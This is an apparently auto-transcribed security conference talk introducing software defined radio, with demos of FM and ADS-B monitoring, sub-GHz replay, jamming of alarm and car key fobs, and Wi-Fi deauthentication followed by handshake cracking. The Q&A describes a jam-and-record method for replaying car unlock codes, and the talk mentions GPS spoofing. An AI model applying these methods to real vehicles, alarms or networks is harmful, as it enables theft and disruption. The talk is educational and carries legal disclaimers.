Introduction to Software Defined Radio for Offensive and Defensive Operations

all right everybody Welcome as you can see my setup was extremely involved start yet okay sorry denied normally at Defcon they make him do a shot but this isn't Defcon this is besides Pittsburgh so instead we make all our speakers wear Blinky cat ear pull out the little Tab and there you go and then push the button

gotcha all right yeah hey how do I [Applause] look all right so yeah you guys saw me fumbling with everything in my bag that feeling you get when your flipper zero is on the bottom of the bag under everything else so I brought a ton of stuff thinking oh yeah I could do all these demos it's going to be wonderful we are surrounded by Steel and concrete so all my demos are probably not going to work but that's okay some of them I got videos for but I'm still going to go through the motions you can see how this stuff works so yeah let's do this all right so I am going to introduce you to

softwar defined radio this is applied meaning that I'm not going to go through much of the theory I'm going to talk about mostly what you would use software to find radio for if you were a beginner intermediate maybe some advanced stuff but I'm giving it a little bit of a a flavor I'm giving it some of that offensive and defensive flavor this is all material that I've been able to accumulate from maybe 12 years of doing this stuff out in the field a lot of the equipment that I had was very plug-and-play Advanced Equipment and if you tried to dig into it it would be very complicated so instead I'm using stuff you can get

on the market some of it costs maybe 20 bucks other things are a lot more expensive than that but I just want to show you what you're capable of doing with just some basic software defined radio and not a whole lot of skills so this is not going to be comprehensive by any means there are some of you in there that probably know a whole lot more than I do when it comes to using this equipment and applying it to certain situations but that's okay because there's some people in here that probably have no experience and that's great if you take something away from here that's fantastic to me that's comprehensive enough um I'm not going to

get that complicated for reasons I already explained um because a lot of the stuff may not work especially when you're looking at aircraft signals stuff like that just because the signal is not going to be able to penetrate the structure it's as simple as that radio was very finicky and then it's not going to be exact when you key a frequency into a radio depending on the quality of the radio you may get that frequency or you may get something that's a few Hertz or or megahertz over that way or over that way it's not an exact science radio is fluid radio was weird but it's a whole lot of fun so who am I I um I'm former Air

Force I just retired I dealt mostly with signals intelligence I did a lot of language translation some language M transation um I did a lot of digital Network intelligence stuff which is fine and good it's very complicated but delving into that realm it kind of got me into well this is all great it's all OSI model layer three maybe some layer two layer 4 that's great everybody was ignoring the layer one it's like as soon as the Cold War ended and we got into the global war on terror everything was about cyber cyber this cyber that people kind of forgot about what's going on in the airwaves there's a process we use called electronic preparation of the

battle space that's where you go in with weird equipment like this you see what's in the airwaves and you try to decipher what it is you try to assign it to a particular Target if it's not your target you ignore it if it is your Target then you assign it to somebody and they analyze it without that kind of preparation you're just going to be Flying Blind you have no idea what's in your environment you have no idea how the adversary is communicating you have no idea if the way that you're communicating is going to work because it might be interfering with something that's already in the environment so I also did a little bit

of forensics I do some penetration testing I'm not going to get into that um I really like radio I'm I I say that I'm obsessed with RS F I like it because a lot of other people don't so it's a very accessible hobby but it's also a way that you can try to manipulate your environment just a little bit your Wi-Fi is not working great I know how to survey that to see what's interfering with it so you get the best signal you get interference on your TV it's all staticky because you haven't joined the 90s and you have rabbit ear antennas like these for your TV fine I can show you how to orient that to get way better

TV signal in fact I will take you to the store and buy you a digital antenna I will do you that solid I also like long walks on a sidewalk I'm not a beach guy I've never been a beach guy you can tell from my complexion of a vampire if we had to do this shirt list I would blind all of you with how notand I am so let's move on SDR is just what it sounds like it's softwar defined radio your typical radio it is going to have a few circuits a few crystals it might have some coils of copper it's going to have something that moves along those coils of copper and that's what's going to resonate on

certain frequencies it's a radio who here has not built a radio or who here has built a radio it's kind of a Dying art yeah a lot of you that's awesome software defined radio was taking all that and turning it into binary it's radio on a chip essentially what you're looking at is something really small compact that has a little bit of circuitry in it and that circuitry has one job it converts electrical and electronic signals into something that a computer or software application can read so electrical signal radio signal into binary binary back into electrical signal that's all what it's missing is what a radio like this has it's missing a display it's missing speakers it's

missing something to modulate or demodulate certain signals it's missing something that allows a human to understand what these antennas are picking up so with a software defined radio you have kind of the radio but then you need the software to Define it and that's where your laptop your computer your Raspberry Pi comes in the antennas are going to do what antennas do the antenna so when you're using a softwar defined radio think of it as the computer and the SDR module itself are the radio the antenna means something it's just like any other radio you need the right antenna to do the right job and we'll get into some of that it's very versatile extremely versatile you

could do everything from talk to satellites to to hack Wi-Fi and hack somebody's car with a softwar defined radio in the old days you you used to have like very specific equipment that would have to do this you have one tool for the job anyone here clone cards you use aox Mark II to clone cards and you can get into hotel rooms we're not going to get into that either but it's been done you need to clone a key fob great you have a sub gigahertz receiver you can do that with a software defin radio with the right stack with the right equipment built up on it with the right application you can make one SDR module

do all of that stuff it's a lot less crap you got to carry in your backpack so that's what that comes down to and you can see from the pictures there's a lot of applications this can be for satellites it could be as big as small as you want you can have your cell phone do it you can have a Raspberry Pi do it you could have an Arduino do it everything that everything that can run signals and run an application can do as so this is what I'm going to introduce you to today you have a flipper zero I don't I think anyone knows what these are you have a hack RF hack RFS are

fantastic and then I also have an RTL SDR here are some of the key differences an rtlsdr is it's it's affordable it's versatile it's nice it runs really hot so don't touch it after you've been using it for a half hour but it's receive only a hackrf can do all the stuff that an an rtlsdr can do but can also send signals and that's going to be important for some of the stuff we get into and then a flipper zero can do all that it can receive it can send but it's like a Swiss army knife has anyone here ever tried to build a shelter just with a Swiss army knife it sucks you're not

using you're using the right tool for the job but it's not not the right size and configuration of the tool you can do a lot of stuff with a Swiss army knife but not all of it is good you'd rather have a real cork scw instead of the cork screw on the Swiss army knife that's a flipper zero it can do a lot of stuff but there are better tools out there that can do the same stuff it can do but if you want something that's just in your pocket that may or may not get confiscated at the Canadian border that's a flipper zero all right some of the software we're going to be using I have a couple

of favorites I like SDR sharp it's made for Windows but it can run on Linux I also like uh SDR angel It's Made for Linux but it can run on Windows and if it can run on Linux it can run on Mac so for those Mac users out here you can more than likely use the same stuff I'm using if not a very cursory Google search will give you a whole list of SDR applications that you can use that you can pair with your Hardware that'll do all the same stuff that I'm going to demo today just a couple of definitions here when I say noise floor what I mean is you have noise and then you have

nothing if you're listening down here you're going to get all the noise you're going to get static voice digital whatever it is if you listen above that you get nothing that's your noise floor you can raise it or you can lower it depending on your sensitivity level a peak when you key a signal or you try to hone in on a signal that signal is going to peek up and you can tell the noise floor is going to raise where that frequency is that means there's something interesting there when you start getting good at this stuff you can tell what kind of signal it is just by what the peak looks like and then you

have the waterfall the waterfall is the multicolor thing underneath that histogram it is going to flow steadily down this way and it's temporarily engaged meaning that if you find a peak or or some other change in a noise floor it's going to change the color of the waterfall where that Peak is and if that Peak goes away you'll see in the waterfall that color change goes away too it's kind of cool it's real time if you record it and you leave a radio just sitting somewhere for a few hours you can go back and you can review the waterfall and you can see where there were Peaks where there were changes in color what frequencies are present in

this area you are doing your you're doing your electronic preparation of the battle space you are seeing the frequencies that are present all right the first demo was going to be with just plain FM radio this is a bang radio you can get this on Amazon for like a hundred of them for 5 cents like they're really really cheap they also break a lot so if you can get a 10 pack I recommend that when the apocalypse comes you'll be ready it's either it's either that or you spend 400 bucks on that really really good Kenwood radio that can do everything but the problem is that Kenwood is made for amateur radio only the handbands this guy can go

on Ms F FRS gmrs Maritime airband FM radio it can do all kinds of other stuff it's not restricted by the FCC what that also means is if you mess around with this you're liable to get yourself slapped on the wrist somehow by the government so be careful with something that's like this if you just want to listen to stuff you're fine it's transmitting that's going to get the cops called after you please ask me how I know all right so the first thing I'm going to do here is I'm going to call up sdrsharp I am key2 46261 that is the frequency I'm on I'm going to change this to 462 612 you guys can only see the slides let

me end the show we'll start it back up when we need to

come on man the live demo gods are not being nice to me all right there we go good so I'm at 462 612 on the radio 462 612 on sdrsharp and this is reading the signal that's coming into the these rabbit ears going into my rtlsdr if you recall that's the small gray one that's receive only here we go I'm going to key it and that's what it looks like if you had a good expensive Kenwood radio you would see one Peak and it would look so nice this is a $30 bow Fang it is not going to be a clean signal but it works it definitely works here I'll even test it out check one two check check one

two I wonder if you guys were able to hear anything any of that probably not but that's okay check check check check that's all right it's an imperfect system but this is what you would set up and you can set up however many number of these with any number of antennas on any number of frequencies to try to get an idea of what's playing in your environment my local Chick-fil-A uses Channel 20 on gmrs to convey all of the orders so I tune this to what channel 20 is on gmrs which is 462 612 or something close to that so I can hear it when they radio my order in so if they get it wrong I already know

what's up you can do this um in a more military sense if you are trying to radio for enemy activity you can set up an SDR or something similar to this to have a very wide range and a wide band of receive and you don't have to listen to the communications you just look at the waterfall while the waterfall is going down and if you notice when I keyed there was a waterfall change you see that if I recorded that waterfall and I played it back at like 10 times speed 20 times speed whatever and I paused it whenever I saw a change in the waterfall I can snapshot that see where the frequencies were and then if I

was recording everything that this was pulling in including the audio then I can go and analyze the signal is it data is it voice is it visual is it graphic is it analog is it packet radio after a while you can tell by what the peaks look like for what kind of Digital Data it is or analog data make sense all right let's get back to my slideshow because you guys love slides just like I do all right so we demoed that the next thing that I wanted to demo was adsb signal capture adsb it breaks out to something nobody cares but essentially it's similar to transponder frequencies that come off of aircraft when you pick up these signals

you will be able to see the aircraft call sign its altitude its speed its direction and if it has any information about its destination and where it came from its point of origin you'll see that too you can see the makeing model of the aircraft and if you're Savvy enough with adsb you can actually plot its coordinates on a map so you can see what's going on this antenna over here is an antenna that is specifically designed for 1090 mahz or 1.09 GHz it is specifically designed to pick up adsb signals I tested it out in four different places in this convention center and the only place where I can get live signals was at track one so

they put me in track two so I'm not going to be able to pick up anything live but I made a recording of some of the stuff that I picked up so we can possibly watch some of that right so you can see that the aircraft are moving you can see that I'm selecting some of them to see what kind of aircraft it is we have one that's southbound that I have selected we have another one that's going eastbound this one is east coast Jets it's a Lear jet which is nice this one over here is a Boeing you can see that it's going to Detroit Philadelphia Detroit this one is out of LaGuardia and these are live almost real time you

can see the altitude you can see their squawk you can see what kind of plane it is the heading you could zoom in and you could see some more detail if you wanted to you can see that you have an x on the ground where you'd be able to see it from directly from directly up and then those vertical lines to the icon of the plane that's kind of Representative of its altitude you have people that have these things set up all over the world all you need to do is just look for it online and you'll see these live feeds this is another way that somebody that didn't have special equipment could set up via some air tasking order how we can

how we can detect the air traffic in a particular area if we wanted to do an operation is there going to be interference in the air at what altitude is a commercial is it private is it mostly helicopter is it twin engine is it 4 engine what is it and this is a good way to do that adsb signals are unclassified you can pick them up wherever the program I'm using is called dump 1090 I'm not a fan of the name but dump 1090 it dumps all of the packets I'm cturing at 1090 MHz and it gives you all of this digitally having a server give it to you on a map is a good nice to have and

that's something that makes it look pretty but in reality if you're going low power and you don't have an internet connection to manifest a map like this just this text over here is good enough to give you all the information that you need all right we already did this I would like to go past this now all right if you don't have this equipment like I said you use someone else's here's a few websites where you can go where you can see some of these live feeds you can pick the location and you can see whatever aircraft are flying some in-laws are coming to visit and you want to track their aircraft if it took

off in time yeah you can go to Delta's website or whatever or and bear with me on this one you go to one of these sites near their airport see if anyone is tracking the adsb activity and then you can tell them exactly when their aircraft took off what path it's taking and you could even be their tour guide you could track it for the entire trip if you have a map behind you you can tell them hey you guys just so you know at this time you were passing by whatever if you look down to your left you could have seen this Lake it'll Amaze them that's adsb so let's get a little bit deeper

into this now those are pretty good beginner projects that'll probably keep you entertained for a month or so then you want to start getting a little bit malicious um I like messing with sub gigahertz sub gigahertz is anything that's below maybe you know the 2.4 gahz Wi-Fi range and the ism band now you're looking into things like iot car fobs uh key fobs home alarm systems industrial controls plc's stuff like that I like to mess with these things because I like to tell people hey I messed with it this is how you can fix it it's kind of my job so that's why I like to mess with this stuff but with softwar defined radio you can detect all kinds

of signals the real challenge comes with well what signal is it because we are immersed with RF these days there's sub gigahertz stuff everywhere you walk around your house with a spectrum analyzer you'll pick up dozens and dozens of signals and be like where the hell is this stuff coming from what is this you could have a a smart device that you don't even know about it could be the tire pressure sensor monit s on your car that are keying at 430 whatever mehz it could be your alarm system it could be your door alarm it could be a camera it could be decked cordless wireless phones it could be a baby monitor there's so many things that it

could be a lot of the fun is investigating it but if you dig too deep it'll also frustrate you but that's neither here nor there what I'm going to get into is trying to hack some of this stuff this is my disclaimer if you want to do anything any of this stuff you're going to do it with your own equipment in a home lab or you're going to do it with somebody's permission do not be stupid with this kind of stuff Homeland Security the FBI and the FCC believe it or not they have enough teeth that if you mess with some electrical Grid or some other iot or commercial alarms they will come after you so what I'm going to demo is going

to be that kind of stuff but it's going to be low power and it's not going to mess with anything if anyone here suddenly has lapses in like some device or some service or whatever I'm sorry I'm sorry but you chose to sit here so let's move on all right your typical order of operations for Signal analysis is you pick up the device if it is made in the US particularly you look for the FCC ID the FCC ID is something that you could find online you go to fcc.gov something like that you can do a cursory Google search it'll take you right there you HP in that alpha numeric FCC ID it'll take you to a spec sheet that spec sheet will

say what frequency it operates on and then bam you have a starting point and this is if you want to analyze some device like your car key fob or something else that you happen to buy in the US if you want to go even deeper you can demodulate the signal to see exactly what the binary says because sometimes it's not just an onoff signal sometimes it carries some data you know maybe like a sequence counter or you know some other random number generator like for key car fob um or a car key fob um sometimes it is that simple other times it really isn't that simple at all and it takes a lot of work to figure out exactly what you're

looking at I wanted to test this device this is an alarm it's something you could put on a door a cabinet a garage door anything the way that it works is that you have the alarm unit and then you have this mag strip over here when they are matched up the alarm is inactive I don't think I have this active but just in case I do get ready for a loud noise when you separate them all right good the alarm goes off I'm going to put these together and I am going to arm this I'm going to take it away if anyone is not down with loud noises cover your ears in three two one and I just unlocked it that's the

alarm here's the kind of fun that we can have with this alarm this is the fob controller that activates and deactivates the alarm it arms and disarms it is a lot of fun working with this stuff so I'm going to stop this I'm going to go back to rtlsdr now if I key this it's wasn't supposed to do that sorry it should give you some kind of kind of a signal this is the disarm now just by virtue of doing some searching I figured out where this signal was and if I could remember then this would be fantastic but don't worry if I can't remember I got a video of it because I'm awesome like

that h well if that fails the other standard is about 315

mahz strange weird can't find it remember when I said this is not an exact science sometimes stuff like this will happen something might be interfering where can't pick it up oh there it is there we go we got it all right crisis averted way to go gray fox so there's my signal it's at [Music]

what was going on with this alarm the problem is that when I opened it up I found nothing no FCC ID nothing like that so this I had to do by hand exactly what you just saw that's probably 20 hours of my days is doing stuff like that just doing some general research finding where stuff like this would operate in a general sense and then going and troubleshooting and that's basically what you do when I cracked this open I found nothing that told me any frequency so I had to go and I had to do it manually so that's what you have to work with sometimes and that's why this was so much fun so we're going

to Signal replay it a signal replay is essentially where you take the signal you copy it you replay it I'm going to use a flipper zero to do this here is my flipper zero so you go to start and the cool thing about this it's a jack of all trades you go to sub gigahertz and you can read essentially anything that you want to so I'm going to go here and now I can read I can read raw I could do save stuff if I read raw it just gives me one of these now I'm going to hit record let's do the unlock signal there it is now I'm going to stop this bam and now I can save it or I can send

it I am not pushing any single button here

come on man you can do

this let me save it and see if that makes a difference save that's fine all right go back go to saved let's play this

H I'm G try it one more time I don't know this never happens all right let's redraw going to record this unlock stop send

interesting all right well that's demo failure number one but I think you guys all get the idea you saw that I recorded a signal this repeats and then it should give you the same kind of signal back the reason why it's not playing I'm not sure it might be the proximity of some other signal it could also be that I had the fob right there but yeah weird anyway that's failure number one and I apologize for that but that's okay we're going to press on but you saw how that works you saw how I did that the principle is the same and you can do a Dos attack using the same principles now you saw how did a

copy and how I did like a repeat it didn't work on this one but it could work on other ones another way to do this is not copying a signal but just trying to deny the signal now the way you do that is you have a signal something like this remote that's putting out that alarm signal if I can't copy it and replay it then I can make sure that nobody can play it ever again I know the frequency this operates on so I can generate that signal and I can drown it out the way to explain a Dos attack with radio is the same thing as like someone is having a conversation and you walk right up to them you

go nobody can hear what they're saying you just Doss them that's how that works now I'm kind of hoping this demo also works we'll see what happens but here we go now I have SDR sharp and I have SDR Angel up SDR Angel is connected to my hack RF this can generate a signal whereas the SD rtlsdr only receives a signal I know what the frequency is here I'm going to key this again and you see that signal went up so if I start my hack RF and I start generating a signal I can take this signal down right where I need it and you can see the peak is there and I moved it ju excuse me just about where I need

it let's zoom in a little B bit all right so you can see over here that's the signal I'm generating right there that big peak now do this unlock again all right now let me move the signal closer in where it's just above this signal all right now let's amplify it give it some more oomph give us some more juice and now widen it a little bit you can see the signal is still going but this is not reading it it's being drowned out by the hack RF this demo worked nailed

it you can do the same thing with all kinds of other RF and this is why I had that disclaimer that disclaimer definitely means means something you want to make sure you're not doing something illegal because if you dos you denial of service something that people depend on like the electrical Grid or water or a vehicle it can be hairy for you this video is me demoing the same thing with a car fob unfortunately I don't have any sound if you did have sound then you would hear that the car is actually going beep when I do this now I start the signal with the hack RF and I'm going to amplify it and I'm

going to widen it a little bit so I can try to drown out that signal now I got a big signal and now you see lights aren't going on nothing is happening I drowned out that signal it'd be cooler if you had the uh the audio so you could hear the beeps but just seeing the lights not activate that's enough to demonstrate that this dos attack worked on that particular vehicle so let's go to the next slide because we already saw this okay now that we went over that here's some more ideas things I'm not able to demo simply because there's not enough time or I just don't want to get arrested you can get a tiny sa Ultra

Spectrum analyzer which is a really cool little handheld thing that can analyze the Spectrum in a really wide view and it'll give you that waterfall that I'm talking about so with just one antenna that can cover a whole bunch of RF you could see exactly what's going on in your environment in something like 100 megaherz worth of bandwidth or maybe a gigahertz of bandwidth obviously the more wide you get the less accurate you are but it gives you something to start next thing you can do is Radio Direction finding there's an SDR called Kraken SDR it's called Kraken SDR because it has six I think it's six it could be eight different antenna outputs that you can

attach each antenna gives you a little bit of an offset of how you're going to detect your RF that offset will allow you to triangulate signals so if I have an antenna here an antenna there and somebody Keys over there this will get a stronger signal this will get a weaker signal let me reorient this way somebody Keys over there same signal same signal great now we can triangulate and we can at least get somewhat of a defined area of where that signal is and that's how you Direction find you can use a blade RF and you can start your own cellular phone service thing stingrays do that already but they only do it on 2G I hate

to tell you guys there's new technology that allows those who can afford it whether it's government or not to be able to simulate cell towers that are also 3G sometimes LTE but I have no documentation on that probably because it's super classified but if you use a blade RF and you happen to work in the 5G LTE or even the 3G UMTS space you can simulate a cell tower and you can start doing experiments and Pen testing it's about the same price point as a hack RF and then you can do GPS signal spoofing and you can use a lot lot of things for this but I've only ever done it with a hack RF or a lime SDR you can get on

GitHub and you can get a GPS simulator you can spoof GPS signals from a hack RF I can do this on the side of a highway your in-laws are coming to visit you don't want them to find you they have their GPS on they know they're heading to Pittsburgh but as soon as they reach 376 suddenly their GPS says they're in Thailand you might buy yourself some time I'm not advocating for this I'm just saying it's applied preparation of the ble space remember let's see how much time we have left not a lot but I can't demo Wi-Fi but Wi-Fi is everywhere and you can use a flipper zero and probably some of this other equipment to do a Wi-Fi Deo attack

and the way that you would do that would be using this guy so if you have a Wi-Fi Dev board on your gpio which is the top of your your uh um flipper zero you could put like different boards in these chips and it'll give you some expanded capabilities I was using a Wi-Fi Dev board this can do natively rfir um like RFID infrared sub gigahertz stuff it can't do Wi-Fi natively so you got to put in your own board using that I detected all the beacon packets of ssids that were around me I listed them I found my Target and then after I found my target I went and I started putting out de off packets for those of you not

familiar how to hack Wi-Fi the way Wi-Fi talks to each other is you're authenticated to a network it goes by packets in the air if you inject packets that say de authenticate that user it'll de authenticate and if that user Auto connects back then you can collect those new authentication packets which has the password in it and that's how you would crack a Wi-Fi password and that's what I did here my attack is going to be de off now I'm running it and then I'm going to go down here I'm going to sniff all the raw packets now that I'm sending do off I am now sniffing those packets and then if all goes correctly

after you're finished collecting stuff you stop it and then you save that file this is me collecting all those packets including the deauthentication and reauthentication packets if I'm lucky I'm going to get packets that are going to be EA pole packets otherwise known as reauthentication packets it's going to be your Wi-Fi four-way handshake it's going to have passwords in it probably encrypted but that's why we do that's why we do password cracking and so now I saved it saving it I can open it up with some kind of a packet analyzer which for me is going to be wire shark and then there you go I went and I did a search for EA pole

packets and I was able to find them did I do that search I don't know I don't think I recorded that part but if you filter for EAP which is a extensible authentic appication something you you smart people probably know what it is I work in layer one man but those are packets that are going to have the passwords and then from there you would crack it but that's beyond our scope unfortunately so let's do it anyway here we are this is me in Linux C Linux and I'm doing run-of-the Mill air crack NG stuff just like anyone else does I'm selecting my packets then I'm going to go through and I'm going to bruteforce it

and I'm going to get what I need to get this video is going to play out and then the next slide is just going to be questions so while this is playing out any questions yes I'm sorry but the war has taken my hearing all right here we go from what you showed me would it be possible to identify and recognize air air gap computers and servers and disrupt them from these signals that's complicated you could do that so the question basically is you have an air gapped computer that has no network connectivity can you use software defined radio to detect it the answer is yes but it's not going to give you what you think it's going to give you so

airgap computers need to run so they're going to have power cords power cables you're going to have resident frequencies from the power cables if you get really deep into like things like van e freaking where you pick up signals from an LED monitor and you reproduce a picture from the pixelation sequence you can do that but unfortunately none of that really has the intelligence value that you might need so if you're looking for something that will you know if you're looking for Content stuff like that SDR is not going to get you what you need you need to you're going to need to have physical access to that air gap computer in order to either put a

transmitter on it or to have something so close to it that you can maybe pick up data that's going through like um unshielded twisted pair ethernet something like that does that answer your question all right anyone else hey thank you um so there's like some dude who tracks people's airplanes on Twitter like Taylor Swift and Elon Musk and then he puts out the I don't know where their aircraft is do you know if he's doing that using some of these public repositories of adsb channels or is he using his own or is there some other way yeah that's that's probably part of it the thing is there are many ways that you can detect trajectories

locations of aircraft um adsb is one of them but it's not the end all be all it's just one component you can also have more sophisticated equipment that can actually get the official transponders of these aircraft you might also have other means that are not software defined radio but are actually like Network Taps that can get into like that maybe have access to servers that have these data and then from there you can en Rich whatever program that you want but if you're doing it specifically just with software defined radio commercial commercial offthe shelf stuff adsb is more than likely 75% of what they're getting and then the other 25% is going to be like um you know actual

transponders like real FAA transponder frequencies which are typically not advertised because you know they're they're meant to be sensitive government Communications you know I may be wrong on that one but it's not something that's well advertised whereas adsb is just out there in the open the problem is you're not required to transmit adsb signals you are required to transmit transponder frequencies so you may get what you want you may not get get what you want you know but for for the most part you know a lot of that is going to come from something like adsb answer your question all right cool what else yes I got a question about the um the car fob yeah right say you did a

basically a masking of the uh car fob um unlocking a car right by I a larger band now does that mean let's say I'm that you I'm that driver and I press it three four times I'm like God the battery's dead or something I stopped can you now Replay that first capture yeah because he blocked it I'm really glad you asked that that was going to be something I wanted to demo but it probably would have taken up a lot of time you you can jam that kind of a signal so that the user do so that the user of the key fob cannot activate or deactivate the car or interact with it one way or another but

you saw that the signal was still being played even though I was jamming it you could record that and then you can get a band filter or some other kind of digital filter where you take out the raw signal that I was playing and now you have that original signal another way to do it and I was too low of power to do this but you offset the jam signal by a few Hertz so that you have the concurrent signals they're next to each other they're not interfering with each other but this one is still so loud that it's still within the band pass of the original signal so it'll still block it but now I have an unfettered recording

of that and that's actually the way that that works you jam it so someone's not able to get to the car and then they walk away to try to call somebody or whatever now that I recorded these but they are not recorded in in the vehicle security system I can success replay them remember that disclaimer all right anyone else yeah I have a question um appreciate the warning on you know do this to your own equipment is there anything that is uh Cloud connected or anything like that that you have to be careful like even though you're doing the local signal that um you know might get detected and picked up uh by those service providers the VA loves me

because my hearing is crap so I'm going to come over to you and can you please repeat that so you're hacking that was another free demo of a DOT go ahead all right let's try this one more time so when you're uh going after your own equipment is there anything that you you need to be careful of um when the equipment is like Cloud connected that they can tell even though it's a local signal that you're interfering with but they get some sort of feedback um no if I'm understanding you right you have you have equipment that's connected but it is also being Cloud backed up or it has another connection everything we're doing is layer one it's all going to be

in the immediate RF environment so if it's connected over the internet to something then there should be zero interference unless like you know your Cloud Server or wherever was on Prem next door then you might have somebody knocking down your door but yeah you should be fine got a radius with this guy all right anybody else what was your uh most interesting thing that you've seen that uh gave off a frequency that surprised you most interesting thing okay well there's a lot I'll give you the most recent interesting thing when I was designing this presentation in my home lab I had this very cable that's connecting my laptop to the audio visual it's it's a it's a display port to HDMI

converting cable at particular frequency ques with that same bow Fang radio specifically at about 146 and 147 MHz if I was within 3T of it I would key it and it would kill it it would kill the cord my monitor would just go blank and it would reset I'd back up a foot do it again nothing go forward a foot do it again kill the monitor go forward another foot do it again kill the monitor I went up a few megahertz same thing went up a few more megahertz nothing so that to me means that this cable is resonant to some frequency that can gain interference from a strong radio signal and that to me is really

really interesting because once again that disclaimer if you get something that's strong enough you may be able to disrupt an entire organization's wires everywhere you could black monitors out you can black electrical cables out iot anything that happens to like have either a really crappily designed cable or a crappily designed monitor you can dos all that stuff I think that's super super interesting because it happens instantaneously and if you try to analyze it it's already too late you have no monitor so how you going to analyze it anyway all right I I'm pretty sure that I'm out of time by now but if anyone wants to catch me offline you can I'll be around anyone else okay one more

whenever you were preparing your battle space how often was it that you encountered signals you couldn't identify and how did you deal with those the the middle of the question can you repeat that how often did you encounter signals that you couldn't identify and how did you deal with those all the time every time um most typically we would have documentation from you know from like um some precedent Source like other surveys that you know people may have done or things that we get from open source or even classified material that would tell us what signals were being put out by what we know that there are cell towers in the area we know that there are radio

towers there's VHF UHF repeaters uh DMR radio repeaters the apcs and tanks that you know these units are using communicate over this frequency for their command and control we would know a lot of that and the majority of our job was listening to make sure that that was right and if we didn't hear any of that then we would go searching around it to see if we could find it if they changed it if we're going into an area that just has raw signals everywhere and we have no prior intelligence from any documentation or any other intelligence Source on the ground then it's it could take two weeks three weeks maybe a month even a year depending on where we are to

get a real good idea of like what the Baseline noise floor is and what those frequencies are what they go to how to retribute them it also depends on like the kind of Target if we have if we got a call that somebody somewhere is going to do something bad it's going to be kinetic and people are going to get hurt sometimes we don't care about the RF we'll go to human intelligence or some other intelligence and we just won't listen on signals because we just don't have the time but if it's something where we can take our time we can survey an area and we need to go in here and we can't put people in there because it's a

non-permissive area then we'll sit there and we'll analyze those signals as much as we can and I would probably say 50% of the time we can't attribute a signal and if we can't attribute it there's nothing we can do about that sometimes you got to stop admir the problem and you got to move on other times you can make definite sure what you're seeing is what you're seeing if you have a UAV flying over a particular truck and you keep getting CB radio coming off of it and it collocates with that truck it's probably that truck all right I'm not going to spend any more time on that let's do it let's move on you know don't

let perfect be the enemy of good when it comes to RF because you're just going to tear your hair out does that make sense all right all right the legendary gray fox everyone all right we're going to start our next talk in about 10 minutes going take a break and come on back I hear the cookie tables out